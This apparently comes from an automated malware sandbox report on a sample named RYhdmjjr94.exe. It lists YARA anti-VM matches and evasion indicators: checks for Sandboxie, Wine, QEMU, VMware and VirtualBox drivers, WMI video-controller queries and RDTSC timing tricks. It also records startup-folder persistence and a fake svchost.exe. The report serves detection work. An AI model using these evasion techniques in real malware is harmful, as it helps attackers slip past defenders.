                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Yara detected AntiVM3Show sources
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.373b3c0.23.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.38fe890.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.38fe890.26.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.5120000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.5120000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.39702c0.25.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.39702c0.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.394b5e7.24.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.394b5e7.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.39702c0.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.5120000.31.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.5120000.31.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.39702c0.25.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.373b3c0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.38fe890.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.373b3c0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.38fe890.26.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.373b3c0.23.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.565866416.0000000005120000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.401438972.000000000388C000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.412228109.0000000005120000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.435912752.00000000036C9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.461519073.000000000388C000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RYhdmjjr94.exe PID: 4328, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Tries to detect virtualization through RDTSC time measurementsShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
                Source: C:\Windows\System32\svchost.exe TID: 1188Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6580Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732Thread sleep count: 3716 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732Thread sleep count: 409 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6896Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6796Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6960Thread sleep count: 1482 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 980Thread sleep count: 31 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 980Thread sleep time: -28592453314249787s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7052Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5408Thread sleep time: -15679732462653109s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5680Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep count: 1842 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4872Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2252Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1036Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6372Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4856Thread sleep count: 2067 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6524Thread sleep time: -11068046444225724s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3884Thread sleep count: 116 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5232Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1884Thread sleep count: 2247 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6664Thread sleep time: -15679732462653109s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3192Thread sleep count: 277 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1324Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5988Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6240Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6356Thread sleep count: 2128 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6044Thread sleep time: -11068046444225724s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6532Thread sleep count: 83 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4036Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4508
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 732
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3716
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 409
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1482
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1661
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1842
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3022
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2067
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2247
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2367
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2128
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sys
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sys
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Users\user\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                Source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmpBinary or memory string: VMware
                Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareXAEA66A3Win32_VideoController6W_5B8DNVideoController120060621000000.000000-00084.90614display.infMSBDA_XXWOD5RPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsROWC1VGM>
                Source: svchost.exe, 00000003.00000002.591516290.0000028F63E2A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`Sfi
                Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmpBinary or memory string: qi'C:\WINDOWS\system32\drivers\vmmouse.sys
                Source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareXAEA66A3Win32_VideoController6W_5B8DNVideoController120060621000000.000000-00084.90614display.infMSBDA_XXWOD5RPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsROWC1VGM
                Source: svchost.exe, 00000003.00000002.597424824.0000028F6964C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmpBinary or memory string: qi%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
